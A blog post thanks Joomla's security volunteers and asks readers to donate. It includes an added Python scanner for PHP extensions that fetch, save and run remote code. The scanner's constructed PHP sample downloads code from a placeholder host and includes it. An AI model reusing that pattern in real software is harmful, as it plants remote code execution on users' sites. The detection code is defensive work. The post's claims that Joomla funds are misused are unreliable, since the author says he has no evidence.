Thank Your Friendly Joomla Security Strike Team

[Image caption: The JSST: It's just like the TSA, except in every regard.]

This is just a quick intermission, as I delay properly marketing the 1A Landing Page kit, to thank and give kudos to the Joomla Security Strike Team (JSST) and all the researchers contributing their findings via the Vulnerable Extensions List reporting system. They've put out a solid burst of work in recent months, the latter in particular, by investigating extensions for security flaws.

To talk to the entrepreneur class for a moment: if you want Joomla to be a lower-cost investment for you, an ounce of prevention is worth a ton of cure. We have a saying on the internet: please help keep this free, by paying for it. From the various Pizza Bugs & Fun weekends, and similar events taking place around the world at any given time, to the JSST and VEL teams, the people who go looking for trouble of a more time-sensitive nature, you have a high incentive to reward those people, right now.

Yes, this is a blog post about why you should give money to people who aren't me.

In volunteerism, things work in cycles. When you have volunteers who are focused and who gel well in their roles, you get leaps of great progress -- management permitting. But what causes things to flow in the opposite direction? Warm weather is one thing - if you're not being paid, and you're not being forced to kill time indoors, online volunteerism, and online activity of all sorts, naturally wanes. Indeed, the frigid season may account for what I'm about to show you.

But being taken for granted also takes its toll, and I think sometimes Joomla is guilty of asking for money too infrequently. Here is a screenshot of the emails I've kept from the Joomla security email lists.

[Image: A screenshot showing a list of Joomla security emails, taken March 1, 2016, highlighting the dates of a high concentration of emails in recent months.]

Every one of those emails has potentially saved your ass.
I'm guessing you have no idea how exciting this is. I'll explain. By the way, not one of these emails asked me for money -- and that might be a problem.

What you're seeing above is a screen capture of my email inbox, filtered down to emails from the Joomla security departments. As you can see, activity is choppy: highlighted in a blue rectangle is a great burst of work; preceding that, however, is a period where nobody's reporting extension vulnerabilities.

In recent months, during an uptick in Joomla security volunteering, one of the longest-existing and most popular free video-player extensions, which has been around for years and which I believe has the most features of all free options, was found to have a major security flaw. Another video extension specific to playing YouTube -- and which was named such that anyone looking to play YouTube videos on Joomla would leap straight to at least downloading and evaluating that specific extension -- was also found with major security flaws. I'm not just dropping the word "major" in here to be dramatic. One of these recently-discovered flaws, subjected to public scrutiny thanks to the JSST, was importing PHP files to the host server from third-party servers. That's right: a popular video script was phoning home for new marching orders, saving a new script without telling you, and then running that script on your website. Did you know that? Here's another important question: did you buy something nice for the people who found it for you?
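As a defender-side illustration of the pattern just described (an added example, not code from this post or from any Joomla extension), this Python heuristic scans one PHP source file for the fetch-then-write-then-include chain; the two PHP snippets are constructed placeholders, and the pattern lists are an assumption about what such a scan should flag.

```python
import re

# Constructed samples (not from any real extension): the "phone home, save, run"
# chain the post describes, and ordinary code that fetches remote data without running it.
CHAIN_PHP = """<?php
$u = 'http://updates.placeholder.invalid/new.php';
$code = file_get_contents($u);
file_put_contents(__DIR__ . '/cache/helper.php', $code);
include __DIR__ . '/cache/helper.php';
"""
FEED_PHP = """<?php
$feed = file_get_contents('https://api.placeholder.invalid/videos.json');
foreach (json_decode($feed, true) as $i) { echo htmlspecialchars($i['title']); }
"""

FETCH_RE = re.compile(r"\b(?:file_get_contents|fopen|curl_init)\s*\(", re.I)
URL_VAR_RE = re.compile(r"(\$\w+)\s*=\s*['\"]https?://", re.I)   # $u = 'http://...'
WRITE_RE = re.compile(r"\bfile_put_contents\s*\(\s*([^,]+?)\s*,", re.I)
INCLUDE_RE = re.compile(r"\b(?:include|require)(?:_once)?\b\s*\(?\s*([^;]+?)\s*\)?\s*;", re.I)
EVAL_RE = re.compile(r"\beval\s*\(", re.I)

def _norm(expr):
    """Collapse whitespace so __DIR__ . '/x.php' and __DIR__.'/x.php' compare equal."""
    return re.sub(r"\s+", "", expr)

def scan_php(source):
    """Return flags for remote fetch, disk write, include-of-written-file and eval, plus notes."""
    f = {"fetch": False, "write": False, "include_written": False, "eval": False, "notes": []}
    url_vars, written = set(), set()
    for n, line in enumerate(source.splitlines(), 1):
        url_vars.update(URL_VAR_RE.findall(line))
        uses_url = re.search(r"https?://", line, re.I) or any(
            re.search(re.escape(v) + r"\b", line) for v in url_vars)
        if FETCH_RE.search(line) and uses_url:
            f["fetch"] = True; f["notes"].append(f"line {n}: fetches a remote URL")
        for m in WRITE_RE.finditer(line):
            f["write"] = True; written.add(_norm(m.group(1)))
            f["notes"].append(f"line {n}: writes {m.group(1).strip()}")
        for m in INCLUDE_RE.finditer(line):
            if _norm(m.group(1)) in written:      # same path this script just wrote
                f["include_written"] = True
                f["notes"].append(f"line {n}: includes a file this script wrote")
        if EVAL_RE.search(line):
            f["eval"] = True; f["notes"].append(f"line {n}: eval()")
    return f

def is_remote_code_chain(source):
    """True when a remote fetch is followed by eval() or by write-then-include of one path."""
    f = scan_php(source)
    return f["fetch"] and (f["eval"] or (f["write"] and f["include_written"]))
```

Run `is_remote_code_chain` over every `.php` file under an extension directory and review the `notes` of any hit by hand; a remote fetch on its own (the feed sample) is normal and is reported but not flagged.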

Here is the only place I can find where donations can be sent directly to support the Joomla project; however, please be aware that your donation is not given directly to the tech people. Former insiders have often said the budget is abused to create a jet-setting lifestyle for the corporate people attached to the project. I have no evidence of that, but it's my observation that this project does not make progress at a pace, or at a level of quality, befitting its popularity. Drupal and WordPress are both improving far faster and with far higher fidelity, and then we have these warnings that the funds are off-balance. You have been warned -- at the moment (and this is a big gripe of mine) there is no way to quickly, directly, and easily donate to a specific team such as the JSST -- you can only let Open Source Matters decide the budget, and that may not be the best thing.

No matter what I, or anyone else, may say about the management system in place for the Joomla project, the above image proves the grunts in the trenches have been doing their part. I strongly recommend that anyone who wants Joomla to get stronger and stay that way give at least $15 to $50 to Open Source Matters, but I also recommend you leave a comment in the official Joomla Forums, asking for a way to prioritize your donations in specific ways. There are the people who are serving the users, and then there are people spending money for other reasons. In a publicly funded open source project, I think each person donating should decide the focus of their money, even if the management must "tax" that fund for their own reasons.

XSS' is not TMI, OK?
Perhaps while you're at it, you can convince them to put a little more information into the reports.

© 2018 Nathan Hawks
